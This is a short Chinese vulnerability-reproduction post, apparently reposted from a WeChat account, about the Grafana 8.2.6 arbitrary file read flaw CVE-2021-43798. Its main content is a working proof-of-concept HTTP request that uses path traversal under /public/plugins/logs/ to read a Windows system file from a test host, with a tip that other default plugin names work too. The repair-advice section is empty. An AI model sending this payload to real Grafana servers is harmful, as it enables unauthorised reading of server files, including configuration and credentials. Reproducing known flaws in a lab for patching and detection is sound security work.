0X01 简介
Grafana 8.2.6
0X02 漏洞复现
POC:
GET /public/plugins/logs/../../../../../../../../../../../../../../../../../../../../../../Windows/win.ini HTTP/1.1
Host: 192.168.245.134:3000
Content-Length: 2
注:Windows系统搭建的好像无法带盘符读取,也可能是我方式不对
带盘符读取:
其他路径可以在这里查询/public/plugins/后面接上插件名称(不包含空格),存在一些默认安装的插件。
0X03 修复建议
0X04 写在最后
回复“加群”,获取群号。
侵删!
原文始发于微信公众号(皓月的笔记本):【漏洞复现】Grafana 任意文件读取漏洞(CVE-2021-43798)
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论